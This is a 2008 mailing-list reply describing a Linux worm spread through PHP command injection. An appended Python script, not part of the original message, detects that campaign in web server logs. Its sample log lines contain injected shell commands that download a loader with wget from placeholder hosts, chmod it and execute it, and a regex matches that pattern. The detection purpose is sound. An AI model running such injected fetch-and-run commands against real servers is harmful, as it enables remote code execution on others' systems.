On Mon, 21 Jan 2008, James Knott wrote:-
<snip>
>Anti-virus software is generally not necessary with Linux, unless it's
>being used as a mail or file server in a Windows network. AFAIK,
>there's never been a viable Linux virus.

That depends on whether you include worms and trojans under the
definition of a virus. If so, there have been Linux viruses in the wild.

I still have a copy of a loader script and the IRC bot[0] that was
installed by it, grabbed from an infected server just over 2 years
ago[1].

IIRC, the method of infection for that particular worm was to insert
shell commands[2] into a URL passed to a web server running an
exploitable version of PHP. The commands were executed by a root shell
and were used to download the loader script, set its mode to 744 and then
execute that. The script in question downloaded 2 files, one was the IRC
bot, the other was used to search out and try to infect other web
servers.

At the time, I was seeing over 100 different IP addresses daily, each
sending almost the same commands over a period of several weeks. The
only differences between the commands were the IP address of the server
hosting the loader script and, occasionally, the name of the loader
script.

[0] Compiled using GCC 3.3.6 on a Gentoo system.
[1] File is dated 2005-12-20.
[2] Without digging up my old server logs, I can't be more specific.
Google might have something about it though.

Regards,
David Bolt
--
Team Acorn: http://www.distributed.net/ OGR-P2 @ ~100Mnodes RC5-72 @ ~15Mkeys
SUSE 10.1 32bit | openSUSE 10.2 32bit | openSUSE 10.3 32bit | openSUSE 11.0a0
SUSE 10.1 64bit | openSUSE 10.2 64bit | openSUSE 10.3 64bit
RISC OS 3.6 | TOS 4.02 | openSUSE 10.3 PPC |RISC OS 3.11
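
Added example, not part of the original message: one way a defender could confirm from web server logs the pattern described in the post above, where many source addresses send near-identical injected commands that differ only in the host serving the loader script and the script's name. The log lines, request path, parameter name and the use of wget are constructed assumptions, since the post does not give the actual commands.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log (combined-format style, documentation IP ranges).
# The path, parameter name and use of wget are assumptions, not from the post.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Dec/2005:10:00:01 +0000] "GET /index.php?p=x;cd%20/tmp;wget%20http://198.51.100.7/ldr;chmod%20744%20ldr;./ldr HTTP/1.1" 200 512
192.0.2.44 - - [20/Dec/2005:10:03:12 +0000] "GET /index.php?p=x;cd%20/tmp;wget%20http://198.51.100.23/ldr;chmod%20744%20ldr;./ldr HTTP/1.1" 200 512
203.0.113.5 - - [20/Dec/2005:10:07:40 +0000] "GET /index.php?p=x;cd%20/tmp;wget%20http://198.51.100.7/ldr2;chmod%20744%20ldr2;./ldr2 HTTP/1.1" 200 512
203.0.113.9 - - [20/Dec/2005:10:09:02 +0000] "GET /index.php?p=x;cd%20/tmp;wget%20http://198.51.100.90/ldr;chmod%20744%20ldr;./ldr HTTP/1.1" 200 512
192.0.2.77 - - [20/Dec/2005:10:11:30 +0000] "GET /index.php?p=news HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
URL_RE = re.compile(r"https?://([^/\s;]+)/([^\s;|&]+)")
# A shell separator followed by a download tool and, later, chmod.
SHELL_RE = re.compile(r"[;|&`]\s*(?:wget|curl)\b.*\bchmod\b", re.I)


def template(target):
    """Return (normalised request, host, script) or None if not shell-like."""
    decoded = unquote(target)
    url = URL_RE.search(decoded)
    if not SHELL_RE.search(decoded) or not url:
        return None
    host, script = url.group(1), url.group(2).rsplit("/", 1)[-1]
    norm = decoded.replace(url.group(0), "<URL>")
    # Mask the script name wherever it recurs (chmod target, execution).
    norm = re.sub(r"(?<![\w.-])" + re.escape(script) + r"(?![\w.-])", "<SCRIPT>", norm)
    return norm, host, script


def find_campaigns(log_text, min_sources=3):
    """Group injected requests by template; keep those seen from many sources."""
    groups = defaultdict(lambda: {"sources": set(), "hosts": set(), "scripts": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        hit = template(m.group(2)) if m else None
        if hit:
            norm, host, script = hit
            groups[norm]["sources"].add(m.group(1))
            groups[norm]["hosts"].add(host)
            groups[norm]["scripts"].add(script)
    return {t: g for t, g in groups.items() if len(g["sources"]) >= min_sources}


if __name__ == "__main__":
    for tpl, g in find_campaigns(SAMPLE_LOG).items():
        print(len(g["sources"]), "sources:", tpl, sorted(g["hosts"]), sorted(g["scripts"]))
```

The `hosts` set collected per template is the list of servers hosting the loader, which is the useful output for egress blocking or abuse reports.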